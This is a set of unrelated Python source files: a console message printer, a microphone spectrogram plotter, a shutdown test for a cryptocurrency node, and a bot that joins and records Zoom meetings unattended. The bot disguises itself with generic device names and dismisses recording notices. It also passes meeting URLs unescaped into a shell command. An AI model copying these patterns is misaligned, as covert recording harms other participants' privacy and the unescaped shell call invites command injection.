self.icons.update(icons)
self.anim = animation if can_render(animation) else animation_ascii
@property
def counts(self):
"""Get the counts of how often the special printers were fired,
e.g. MESSAGES.GOOD. Can be used to print an overview like "X warnings".
"""
return self._counts
def good(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a success message."""
return self._get_msg(
title, text, style=MESSAGES.GOOD, show=show, spaced=spaced, exits=exits
)
def fail(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.FAIL, show=show, spaced=spaced, exits=exits
)
def warn(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a warning message."""
return self._get_msg(
title, text, style=MESSAGES.WARN, show=show, spaced=spaced, exits=exits
)
def info(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an informational message."""
return self._get_msg(
title, text, style=MESSAGES.INFO, show=show, spaced=spaced, exits=exits
)
def text(
self,
title="",
text="",
color=None,
icon=None,
spaced=False,
show=True,
no_print=False,
exits=None,
):
"""Print a message.
title (unicode): The main text to print.
text (unicode): Optional additional text to print.
color (unicode / int): Foreground color.
icon (unicode): Name of icon to add.
spaced (unicode): Whether to add newlines around the output.
show (bool): Whether to print or not. Can be used to only output
messages under certain condition, e.g. if --verbose flag is set.
no_print (bool): Don't actually print, just return.
exits (int): Perform a system exit.
"""
if not show:
return
if self.pretty:
color = self.colors.get(color)
icon = self.icons.get(icon)
if icon:
title = locale_escape("{} {}".format(icon, title)).strip()
if self.show_color:
title = _color(title, fg=color)
title = wrap(title, indent=0)
if text:
title = "{}\n{}".format(title, wrap(text, indent=0))
if self.timestamp:
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
title = "{}\t{}".format(now, title)
if exits is not None or spaced:
title = "\n{}\n".format(title)
if not self.no_print and not no_print:
print(title)
if exits is not None:
sys.stdout.flush()
sys.stderr.flush()
if self.no_print or no_print and exits != 0:
try:
raise RuntimeError(title.strip())
except Exception as e:
# Remove wasabi from the traceback and re-raise
tb = "\n".join(traceback.format_stack()[:-3])
raise SystemExit("{}\n{}".format(tb, e))
sys.exit(exits)
if self.no_print or no_print:
return title
def divider(self, text="", char="=", show=True, icon=None):
"""Print a divider with a headline:
============================ Headline here ===========================
text (unicode): Headline text. If empty, only the line is printed.
char (unicode): Line character to repeat, e.g. =.
show (bool): Whether to print or not.
icon (unicode): Optional icon to display with title.
"""
if len(char) != 1:
raise ValueError(
"Divider chars need to be one character long. "
"Received: {}".format(char)
)
if self.pretty:
icon = self.icons.get(icon)
if icon:
text = locale_escape("{} {}".format(icon, text)).strip()
deco = char * (int(round((self.line_max - len(text))) / 2) - 2)
text = " {} ".format(text) if text else ""
text = _color(
"\n{deco}{text}{deco}".format(deco=deco, text=text), bold=True
)
if len(text) < self.line_max:
text = text + char * (self.line_max - len(text))
if self.no_print:
return text
print(text)
def table(self, data, **kwargs):
"""Print data as a table.
data (iterable / dict): The data to render. Either a list of lists
(one per row) or a dict for two-column tables.
kwargs: Table settings. See tables.table for details.
"""
title = kwargs.pop("title", None)
text = table(data, **kwargs)
if title:
self.divider(title)
if self.no_print:
return text
print(text)
def row(self, data, **kwargs):
"""Print a table row.
data (iterable): The individual columns to format.
kwargs: Row settings. See tables.row for details.
"""
text = row(data, **kwargs)
if self.no_print:
return text
print(text)
@contextmanager
def loading(self, text="Loading..."):
if self.no_print:
yield
elif self.hide_animation:
print(text)
yield
else:
sys.stdout.flush()
t = Process(target=self._spinner, args=(text,))
t.start()
try:
yield
except Exception as e:
# Handle exception inside the with block
t.terminate()
sys.stdout.write("\n")
raise (e)
t.terminate()
sys.stdout.write("\r\x1b[2K") # erase line
sys.stdout.flush()
def _spinner(self, text="Loading..."):
for char in itertools.cycle(self.anim):
sys.stdout.write("\r{} {}".format(char, text))
sys.stdout.flush()
time.sleep(0.1)
def _get_msg(self, title, text, style=None, show=None, spaced=False, exits=None):
if self.ignore_warnings and style == MESSAGES.WARN:
show = False
self._counts[style] += 1
return self.text(
title, text, color=style, icon=style, show=show, spaced=spaced, exits=exits
)
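# Hedged usage sketch (not part of the original module), exercising only Printer methods
# defined above; the exact output depends on terminal capabilities and env settings:
#
#     msg = Printer(timestamp=True)
#     msg.divider("Demo")
#     msg.info("Starting", "Processing files...")
#     msg.warn("Heads up", "Two files were skipped.")
#     msg.good("Done", "All remaining files processed.")
#     print(msg.counts)   # Counter of how often each message type was fired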
|
continuousStream.py
|
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
from multiprocessing import Process
import time
import constants
class ContinousStream:
# Displays a continuous stream by buffering <storedSamp> samples
def __init__(self, q, secToDisp, SAMPLING_FREQ, graphUpdateFreq):
# Process in which the plotting runs
self.process = Process(target=self.run)
# Data queue
self.q = q
# Audio sampling frequency
self.SAMPLING_FREQ = SAMPLING_FREQ
# Buffer length
self.storedSamp = secToDisp * SAMPLING_FREQ
self.ybuffer = np.zeros(self.storedSamp, dtype=np.uint16)
# Update frequency of the plot
self.graphUpdateFreq = graphUpdateFreq
# Number of seconds of data displayed
self.xdata = np.arange(-secToDisp, 0, 1. / SAMPLING_FREQ)
self.ydata = np.full(self.xdata.size, constants.AUDIO_MEAN, dtype=np.uint16)
self.ptr = 0
# Number of samples used for computing the Spectrogram
self.sampToSpec = 1024
self.timer = pg.QtCore.QTimer()
self.app = QtGui.QApplication([])
self.app.aboutToQuit.connect(self.cleanUp)
self.win = pg.GraphicsWindow()
def cleanUp(self):
# Stops QT timer
self.timer.stop()
# Closes app
self.win.close()
self.app.closeAllWindows()
print('Window closed')
def start(self):
self.process.start()
def run(self):
self.win.setWindowTitle('Microphone data')
# Sound wave plot
plot = self.win.addPlot()
plot.setLabel('bottom', 'Time', 's')
plot.setLabel('left', 'Amplitude', '')
plot.showGrid(x=True, y=True)
self.curve = plot.plot(x=self.xdata, y=self.ydata, pen=(255,0,0))
# Next row
self.win.nextRow()
# Spectrogram plot
self.specImg = pg.ImageItem()
specPlot = self.win.addPlot()
specPlot.addItem(self.specImg)
self.imgArray = np.zeros((1000, self.sampToSpec//2+1))
# Bipolar colormap
pos = np.array([0., 1., 0.5, 0.25, 0.75])
color = np.array([[0,255,255,255], [255,255,0,255], [0,0,0,255], (0, 0, 255, 255), (255, 0, 0, 255)], dtype=np.ubyte)
cmap = pg.ColorMap(pos, color)
lut = cmap.getLookupTable(0.0, 1.0, 256)
# Set colormap
self.specImg.setLookupTable(lut)
self.specImg.setLevels([-50,40])
# Setup the correct scaling for y-axis
freq = np.arange((self.sampToSpec/2)+1)/(float(self.sampToSpec)/self.SAMPLING_FREQ)
yscale = 1.0/(self.imgArray.shape[1]/freq[-1])
self.specImg.scale((1./self.SAMPLING_FREQ)*self.sampToSpec, yscale)
specPlot.setLabel('left', 'Frequency', units='Hz')
self.wind = np.hanning(self.sampToSpec)
self.timer.timeout.connect(self.update)
# Timer init
self.timer.start(1./self.graphUpdateFreq * 1000)
self.app.exec_()
def update(self):
ptrOld = self.ptr
# Gets samples from queue
while not self.q.empty():
sampleVec = self.q.get()
if sampleVec.size == 19:
self.ybuffer[(self.ptr - ptrOld):(self.ptr - ptrOld + 19)] = sampleVec
self.ptr += 19
# Rolls vector
self.ydata = np.roll(self.ydata, -(self.ptr - ptrOld))
# Copies samples to the plotted vector
self.ydata[self.storedSamp - (self.ptr - ptrOld):] = self.ybuffer[:(self.ptr - ptrOld)]
# Plots data
self.curve.setData(x=self.xdata, y=self.ydata)
# Chunk used in Spectrogram
chunk = self.ydata[(self.storedSamp-self.sampToSpec):]
spec = np.fft.rfft(chunk*self.wind) / self.sampToSpec
# Get magnitude
psd = abs(spec)
# Convert to dB scale
psd = 20 * np.log10(psd)
# Roll down image array
self.imgArray = np.roll(self.imgArray, -1, 0)
self.imgArray[-1:] = psd
# Sets image
self.specImg.setImage(self.imgArray, autoLevels=False)
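# Hedged usage sketch (not part of the original module); the sampling frequency and the
# producer process that puts uint16 sample vectors onto the queue are assumptions:
#
#     from multiprocessing import Queue
#     q = Queue()
#     stream = ContinousStream(q, secToDisp=5, SAMPLING_FREQ=8000, graphUpdateFreq=30)
#     stream.start()   # plots the sound wave and spectrogram in a separate process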
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test redecoind shutdown."""
from threading import Thread
from test_framework.test_framework import redecoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(redecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
zoomrec.py
|
import csv
import logging
import os
import psutil
import pyautogui
import random
import schedule
import signal
import subprocess
import threading
import time
import atexit
import requests
from datetime import datetime, timedelta
global ONGOING_MEETING
global VIDEO_PANEL_HIDED
global TELEGRAM_TOKEN
global TELEGRAM_RETRIES
global TELEGRAM_CHAT_ID
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
# Turn DEBUG on:
# - screenshot on error
# - record joining
# - do not exit container on error
DEBUG = True if os.getenv('DEBUG') == 'True' else False
# Disable failsafe
pyautogui.FAILSAFE = False
# Get vars
BASE_PATH = os.getenv('HOME')
CSV_PATH = os.path.join(BASE_PATH, "meetings.csv")
IMG_PATH = os.path.join(BASE_PATH, "img")
REC_PATH = os.path.join(BASE_PATH, "recordings")
AUDIO_PATH = os.path.join(BASE_PATH, "audio")
DEBUG_PATH = os.path.join(REC_PATH, "screenshots")
TELEGRAM_TOKEN = os.getenv('TELEGRAM_BOT_TOKEN')
TELEGRAM_CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')
TELEGRAM_RETRIES = 5
DISPLAY_NAME = os.getenv('DISPLAY_NAME')
if DISPLAY_NAME is None or len(DISPLAY_NAME) < 3:
NAME_LIST = [
'iPhone',
'iPad',
'Macbook',
'Desktop',
'Huawei',
'Mobile',
'PC',
'Windows',
'Home',
'MyPC',
'Computer',
'Android'
]
DISPLAY_NAME = random.choice(NAME_LIST)
TIME_FORMAT = "%Y-%m-%d_%H-%M-%S"
CSV_DELIMITER = ';'
ONGOING_MEETING = False
VIDEO_PANEL_HIDED = False
class BackgroundThread:
def __init__(self, interval=10):
# Sleep interval between checks
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global ONGOING_MEETING
ONGOING_MEETING = True
logging.debug("Check continuously if meeting has ended..")
while ONGOING_MEETING:
# Check if recording
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'meeting_is_being_recorded.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'got_it.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if ended
if (pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'meeting_ended_by_host_1.png'),
confidence=0.9) is not None or pyautogui.locateOnScreen(
os.path.join(IMG_PATH, 'meeting_ended_by_host_2.png'), confidence=0.9) is not None):
ONGOING_MEETING = False
logging.info("Meeting ended by host..")
time.sleep(self.interval)
class HideViewOptionsThread:
def __init__(self, description="", interval=10):
# Sleep interval between checks
self.interval = interval
# Meeting description, used only for naming debug screenshots
self.description = description
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global VIDEO_PANEL_HIDED
logging.debug("Check continuously if screensharing is active..")
while ONGOING_MEETING:
# Check if host is sharing poll results
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'),
confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Check if view options available
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'view_options.png'), confidence=0.9) is not None:
if not VIDEO_PANEL_HIDED:
logging.info("Screensharing active..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
time.sleep(1)
# Hide video panel
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'show_video_panel.png'),
confidence=0.9) is not None:
# Leave 'Show video panel' and move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
VIDEO_PANEL_HIDED = True
else:
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
# Move mouse from screen
pyautogui.moveTo(0, 0)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
except TypeError:
logging.error("Could not find view options!")
else:
VIDEO_PANEL_HIDED = False
time.sleep(self.interval)
def send_telegram_message(text):
global TELEGRAM_TOKEN
global TELEGRAM_CHAT_ID
global TELEGRAM_RETRIES
if TELEGRAM_TOKEN is None:
logging.error("Telegram token is missing. No Telegram messages will be send!")
return
if TELEGRAM_CHAT_ID is None:
logging.error("Telegram chat_id is missing. No Telegram messages will be send!")
return
if len(TELEGRAM_TOKEN) < 3 or len(TELEGRAM_CHAT_ID) < 3:
logging.error("Telegram token or chat_id missing. No Telegram messages will be send!")
return
url_req = "https://api.telegram.org/bot" + TELEGRAM_TOKEN + "/sendMessage" + "?chat_id=" + TELEGRAM_CHAT_ID + "&text=" + text
tries = 0
done = False
while not done:
results = requests.get(url_req)
results = results.json()
done = 'ok' in results and results['ok']
tries+=1
if not done and tries < TELEGRAM_RETRIES:
logging.error("Sending Telegram message failed, retring in 5 seconds...")
time.sleep(5)
if not done and tries >= TELEGRAM_RETRIES:
logging.error("Sending Telegram message failed {} times, please check your credentials!".format(tries))
done = True
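# Hedged alternative sketch (an assumption, not the original behavior): letting requests
# build the query string would URL-encode the message text instead of concatenating it
# into the URL by hand:
#
#     requests.get(
#         "https://api.telegram.org/bot{}/sendMessage".format(TELEGRAM_TOKEN),
#         params={"chat_id": TELEGRAM_CHAT_ID, "text": text},
#     )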
def check_connecting(zoom_pid, start_date, duration):
# Check if connecting
check_periods = 0
connecting = False
# Check if connecting
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is not None:
connecting = True
logging.info("Connecting..")
# Wait while connecting
# Exit when meeting ends after time
while connecting:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom_pid), signal.SIGQUIT)
return
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is None:
logging.info("Maybe not connecting anymore..")
check_periods += 1
if check_periods >= 2:
connecting = False
logging.info("Not connecting anymore..")
return
time.sleep(2)
def join_meeting_id(meet_id):
logging.info("Join a meeting by ID..")
found_join_meeting = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), minSearchTime=2, confidence=0.9)
pyautogui.click(x, y)
found_join_meeting = True
except TypeError:
pass
if not found_join_meeting:
logging.error("Could not find 'Join Meeting' on screen!")
return False
time.sleep(2)
# Insert meeting id
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.write(meet_id, interval=0.1)
# Insert name
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.hotkey('ctrl', 'a')
pyautogui.write(DISPLAY_NAME, interval=0.1)
# Configure
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
time.sleep(2)
return check_error()
def join_meeting_url():
logging.info("Join a meeting by URL..")
# Insert name
pyautogui.hotkey('ctrl', 'a')
pyautogui.write(DISPLAY_NAME, interval=0.1)
# Configure
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('space')
time.sleep(2)
return check_error()
def check_error():
# Sometimes invalid id error is displayed
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'invalid_meeting_id.png'), confidence=0.9) is not None:
logging.error("Maybe a invalid meeting id was inserted..")
left = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'leave.png'), confidence=0.9)
pyautogui.click(x, y)
left = True
except TypeError:
pass
# Valid id
if left:
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), confidence=0.9) is not None:
logging.error("Invalid meeting id!")
return False
else:
return True
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'authorized_attendees_only.png'), confidence=0.9) is not None:
logging.error("This meeting is for authorized attendees only!")
return False
return True
def find_process_id_by_name(process_name):
list_of_process_objects = []
# Iterate over the all the running process
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'name'])
# Check if process name contains the given name string.
if process_name.lower() in pinfo['name'].lower():
list_of_process_objects.append(pinfo)
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return list_of_process_objects
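# Hedged example (hypothetical pid): find_process_id_by_name('zoom') returns a list of
# dicts such as [{'pid': 1234, 'name': 'zoom'}], one per running process whose name
# contains the given string.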
def show_toolbars():
# Mouse move to show toolbar
width, height = pyautogui.size()
y = (height / 2)
pyautogui.moveTo(0, y, duration=0.5)
pyautogui.moveTo(width - 1, y, duration=0.5)
def join_audio(description):
audio_joined = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_with_computer_audio.png'), confidence=0.9)
logging.info("Join with computer audio..")
pyautogui.click(x, y)
audio_joined = True
return True
except TypeError:
logging.error("Could not join with computer audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_with_computer_audio_error.png")
time.sleep(1)
if not audio_joined:
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_audio.png'), confidence=0.9)
pyautogui.click(x, y)
join_audio(description)
except TypeError:
logging.error("Could not join audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_audio_error.png")
return False
def unmute(description):
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'unmute.png'), confidence=0.9)
pyautogui.click(x, y)
return True
except TypeError:
logging.error("Could not unmute!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(TIME_FORMAT) + "-" + description) + "_unmute_error.png")
return False
def mute(description):
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'mute.png'), confidence=0.9)
pyautogui.click(x, y)
return True
except TypeError:
logging.error("Could not mute!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(TIME_FORMAT) + "-" + description) + "_mute_error.png")
return False
def join(meet_id, meet_pw, duration, description):
global VIDEO_PANEL_HIDED
ffmpeg_debug = None
logging.info("Join meeting: " + description)
if DEBUG:
# Start recording
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
logging.info("Start recording..")
filename = os.path.join(
REC_PATH, time.strftime(TIME_FORMAT)) + "-" + description + "-JOIN.mkv"
command = "ffmpeg -nostats -loglevel quiet -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg_debug = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg_debug.pid), signal.SIGQUIT)
# Exit Zoom if running
exit_process_by_name("zoom")
join_by_url = meet_id.startswith('https://') or meet_id.startswith('http://')
if not join_by_url:
# Start Zoom
zoom = subprocess.Popen("zoom", stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
img_name = 'join_meeting.png'
else:
logging.info("Starting zoom with url")
zoom = subprocess.Popen(f'zoom --url="{meet_id}"', stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
img_name = 'join.png'
# Wait while zoom process is there
list_of_process_ids = find_process_id_by_name('zoom')
while len(list_of_process_ids) <= 0:
logging.info("No Running Zoom Process found!")
list_of_process_ids = find_process_id_by_name('zoom')
time.sleep(1)
# Wait for zoom is started
while pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, img_name), confidence=0.9) is None:
logging.info("Zoom not ready yet!")
time.sleep(1)
logging.info("Zoom started!")
start_date = datetime.now()
if not join_by_url:
joined = join_meeting_id(meet_id)
else:
time.sleep(2)
joined = join_meeting_url()
if not joined:
send_telegram_message("Failed to join meeting {}!".format(description))
logging.error("Failed to join meeting!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG and ffmpeg_debug is not None:
# closing ffmpeg
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
if not join_by_url:
pyautogui.write(meet_pw, interval=0.2)
pyautogui.press('tab')
pyautogui.press('space')
# Joined meeting
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if meeting is started by host
check_periods = 0
meeting_started = True
time.sleep(2)
# Check if waiting for host
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9, minSearchTime=3) is not None:
meeting_started = False
logging.info("Please wait for the host to start this meeting.")
# Wait for the host to start this meeting
# Exit when meeting ends after time
while not meeting_started:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9) is None:
logging.info("Maybe meeting was started now.")
check_periods += 1
if check_periods >= 2:
meeting_started = True
logging.info("Meeting started by host.")
break
time.sleep(2)
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if in waiting room
check_periods = 0
in_waitingroom = False
time.sleep(2)
# Check if joined into waiting room
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'waiting_room.png'), confidence=0.9,
minSearchTime=3) is not None:
in_waitingroom = True
logging.info("Please wait, the meeting host will let you in soon..")
# Wait while host will let you in
# Exit when meeting ends after time
while in_waitingroom:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'waiting_room.png'), confidence=0.9) is None:
logging.info("Maybe no longer in the waiting room..")
check_periods += 1
if check_periods == 2:
logging.info("No longer in the waiting room..")
break
time.sleep(2)
# Meeting joined
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
logging.info("Joined meeting..")
# Check if recording warning is shown at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'meeting_is_being_recorded.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'got_it.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if host is sharing poll results at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Start BackgroundThread
BackgroundThread()
# Set computer audio
time.sleep(2)
if not join_audio(description):
logging.info("Exit!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
time.sleep(2)
join(meet_id, meet_pw, duration, description)
# 'Say' something if path available (mounted)
if os.path.exists(AUDIO_PATH):
play_audio(description)
time.sleep(2)
logging.info("Enter fullscreen..")
show_toolbars()
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
fullscreen = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
fullscreen = True
except TypeError:
logging.error("Could not find fullscreen!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_fullscreen_error.png")
# TODO: Check for 'Exit Full Screen': already fullscreen -> fullscreen = True
# Screensharing already active
if not fullscreen:
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
# Switch to fullscreen
time.sleep(2)
show_toolbars()
logging.info("Enter fullscreen..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'enter_fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not enter fullscreen by image!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_enter_fullscreen_error.png")
return
time.sleep(2)
# Screensharing not active
screensharing_active = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
screensharing_active = True
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
time.sleep(2)
if screensharing_active:
# hide video panel
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_hide_video_panel_error.png")
else:
# switch to speaker view
show_toolbars()
logging.info("Switch view..")
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
try:
# speaker view
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'speaker_view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not switch speaker view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_speaker_view_error.png")
try:
